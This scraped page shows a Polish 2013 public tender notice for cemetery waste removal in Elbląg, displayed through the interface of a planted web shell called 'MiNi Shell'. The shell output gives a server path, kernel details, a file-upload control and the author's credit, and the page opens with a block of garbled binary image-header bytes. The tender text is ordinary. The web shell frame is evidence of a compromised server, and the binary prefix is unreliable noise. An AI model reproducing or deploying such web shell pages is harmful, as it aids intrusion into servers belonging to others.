JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/506134-N-2013.html

<p class="kh_header"><b>Elbląg: WYWÓZ STAŁYCH ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH W ELBLĄGU ORAZ BUDYNKÓW NALEŻĄCYCH  DO  ZARZĄDU  ZIELENI   MIEJSKIEJ  W  ELBLĄGU</b><br>
<b>Numer ogłoszenia: 506134 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej w Elblągu , ul. Krakusa 13-16, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 234 10 75, faks 55 234 15 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sekretariat@zzm.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ STAŁYCH ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH W ELBLĄGU ORAZ BUDYNKÓW NALEŻĄCYCH  DO  ZARZĄDU  ZIELENI   MIEJSKIEJ  W  ELBLĄGU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
1.Przedmiotem zamówienia jest świadczenie usług w zakresie wywozu stałych nieczystości komunalnych z terenu cmentarzy komunalnych w Elblągu: Agrykola zlokalizowanego przy  ul. Agrykola 23,  Dębica zlokalizowanego przy ul. Łęczyckiej 49 w Elblągu oraz budynków należących do Zarządu Zieleni Miejskiej w Elblągu zlokalizowanych przy ul. Krakusa 13 - 16, ul. Marymonckiej 7, ul. Sadowej 1-3 oraz ze Szkółki Drzew i Krzewów Ozdobnych w Gronowie Górnym przy ul. Agatowej 50.
2.Wykonawca na czas trwania umowy odda do dyspozycji Zamawiającego pojemniki i kontenery w ilościach określonych w pkt. 3 niniejszego rozdziału zakres zamówienia.
Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne,    Zamawiający przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania.
3. Wykonawca będzie  także opróżniał pojemniki na odpady segregowane będące własnością Zamawiającego ustawione na terenie cmentarzy komunalnych.
4.Zakres zamówienia 
1Ustawienie na terenie cmentarza komunalnego Agrykola w Elblągu, w miejscach    wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
pojemniki o pojemności 1,1 m3  60 szt. 
pojemniki o pojemności 0,24 m3   12 szt.
Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne, Zamawiający przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania.
wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
Oznaczenie pojemników metodą numeracji.
Wykonawca na wezwanie zamawiającego w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy będzie opróżniał 22 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez Zamawiającego
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy.
2Ustawienie na terenie cmentarza komunalnego Dębica w Elblągu, w miejscach wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
kontenery o pojemności 10 m3  20 szt.
pojemniki o pojemności 1,1 m3  120 szt.
pojemniki o pojemności 7m3 do składowania gruzu  2 szt.
pojemniki o pojemności 0,24 m3   20 szt.
Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne, Zamawiający
przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania.
wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
Oznaczenie pojemników metodą numeracji.
Wykonawca na wezwanie Zamawiającego w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy będzie opróżniał 67 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez zamawiającego
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza. Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy.
3 Ustawienie na terenie przyległym do budynków przy ul. Krakusa 13-16, Marymonckiej 7,
Sadowej 1 - 3 i przy Szkółce Drzew i Krzewów Ozdobnych w Gronowie Górnym 
ul. Agatowa 50 w miejscach wskazanych przez Zamawiającego pojemników 
przystosowanych do składania stałych odpadów komunalnych. Ilość i pojemność
    pojemników, którą należy przewidzieć dla tych lokalizacji przedstawia się następująco:
ul. Marymoncka 7: pojemniki o pojemności 1,1 m3 2szt
ul. Krakusa 13 - 16: pojemniki o pojemności 1,1 m3 2szt
ul. Sadowa 1 - 3 : pojemnik o pojemności 1,1 m3  1szt
Gronowo Elbląskie ul. Agatowa 50 : pojemnik o pojemności 0,24 m3   1szt
Wywóz odpadów nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
Dbanie o stan sanitarny, techniczny i estetyczny pojemników 
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników po ich opróżnieniu.
Wykonawca na wezwanie Zamawiającego w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy będzie opróżniał 1 pojemnik do selektywnej zbiórki odpadów ustawionych przez zamawiającego przy ul. Krakusa 13-16.
5.Wykonawca ma obowiązek zapoznać się z położeniem cmentarzy komunalnych w Elblągu, rozkładem dróg na ich terenie , oraz lokalizacją budynków należących do Zarządu Zieleni Miejskiej w Elblągu objętych przedmiotem zamówienia. 
6. Zamawiający nie ponosi odpowiedzialności za uszkodzenia pojemników na odpady należące do wykonawcy.
7. Wykonawca zobowiązany jest do świadczenia usług własnymi środkami transportu oraz urządzeniami.
8. Ilość odpadów do wywiezienia w trakcie trwania niniejszej umowy wynosi:
 1 Odpady komunalne zmieszane łącznie 1 020 ton
 2 Odpady segregowane łącznie 80 ton
 3 Gruz 300 ton.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z dnia 09.08.2013r.  poz. 907). Spełnienie ww warunku ocenione będzie na podstawie dokumentów i oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 3 do SIWZ), wchodzących w skład oferty.
Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli    przepisy prawa nakładają obowiązek ich posiadania
Wykonawca musi posiadać uprawnienia do wykonywania działalności, stanowiącej przedmiot zamówienia. Wykonawca musi wykazać, że posiada odpowiednie dokumenty uprawniające do prowadzenie działalności gospodarczej w zakresie odbierania odpadów komunalnych zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach  (tekst jednolity Dz. U. z 2012 r. poz. 391 i 951), zezwolenie na prowadzenie działalności gospodarczej w zakresie transportu odpadów zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz.U. z 2010r. Nr 185, poz. 1243 z późn. zm.) oraz posiada aktualną umowę na odbiór lub utylizację odpadów komunalnych. 
Spełnienie tego warunku oceniane będzie na podstawie przedłożonej w ofercie kserokopii licencji, koncesji lub zezwolenia na prowadzenie działalności gospodarczej w zakresie odbierania odpadów komunalnych, zezwolenia na prowadzenie działalności gospodarczej w zakresie transportu odpadów zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach Dz.U. z 2010r. Nr 185, poz. 1243, poświadczonej za zgodność z oryginałem oraz kserokopii aktualnej umowy na odbiór komunalnych nieczystości stałych, zawartej z zakładem prowadzącym działalność w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z dnia 09.08.2013r.  poz. 907). Spełnienie ww warunku ocenione będzie na podstawie dokumentów i oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 3 do SIWZ), wchodzących w skład oferty.
Posiada wiedzę i doświadczenie do wykonania zamówienia
Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji usług stanowiących przedmiot zamówienia tj. wykazać, że wykonał kompleksowo w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, usługi w zakresie wywozu nieczystości o łącznej wartości  nie mniejszej niż 900 000 zł brutto
Spełnienie tego warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w rozdziale VI pkt 1. ppkt 2 SIWZ, sporządzonego wg wzoru, stanowiącego załącznik nr5do niniejszej specyfikacji oraz załączonych do oferty referencji, ocena zostanie dokonana zgodnie z regułą spełnia - nie spełnia
lub innych dokumentów, potwierdzających że ww. usługi zostały wykonane lub są
wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z dnia 09.08.2013r.  poz. 907). Spełnienie ww warunku ocenione będzie na podstawie dokumentów i oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 3 do SIWZ), wchodzących w skład oferty.
Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
wykonania zamówienia. 
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że posiada  pojazdy przeznaczone do odbioru i transportu odpadów komunalnych których rodzaj i ilość zapewni realizację przedmiotu
zamówienia. Spełnienie tego warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w rozdziale VI pkt 1. ppkt 3 SIWZ, sporządzonego wg wzoru,stanowiącego załącznik nr6 do niniejszej specyfikacji,
ocena zostanie dokonana zgodnie z regułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z dnia 09.08.2013r.  poz. 907). Spełnienie ww warunku ocenione będzie na podstawie dokumentów i oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 3 do SIWZ), wchodzących w skład oferty, ocena zostanie dokonana zgodnie z regułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z dnia 09.08.2013r.  poz. 907). Spełnienie ww warunku ocenione będzie na podstawie dokumentów i oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 3 do SIWZ), wchodzących w skład oferty.Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Wykonawca musi wykazać, że posiada opłaconą polisę potwierdzającą ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na min. kwotę 500 000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
Spełnienie tego warunku oceniane będzie na podstawie dokumentu
dołączonego do oferty potwierdzonego za zgodność z oryginałem,
ocena zostanie dokonana zgodnie z regułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z Wykonawcą, który złoży najkorzystniejszą ofertę zostanie podpisana umowa, której
    wzór  stanowi Załącznik Nr7 do niniejszej specyfikacji.
2.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych określa się następujące możliwe zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:
1 zmiana wartości przedmiotu zamówienia: waloryzacja wynagrodzenia umownego w przypadku
      wzrostu wartości składnika cenotwórczego jakim jest cena składowania odpadów w Zakładzie Utylizacji Odpadów 
2 zmiana harmonogramu wywozu nieczystości stałych lub zakresu zamówienia w przypadku zmiany liczby obiektów administrowanych przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzm.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Zieleni Miejskiej w Elblągu	
ul. Krakusa 13 - 16 
82-300 Elbląg
pok. 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:00, miejsce: Zarząd Zieleni Miejskiej w Elblągu	
ul. Krakusa 13 - 16 
82-300 Elbląg
pok. 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com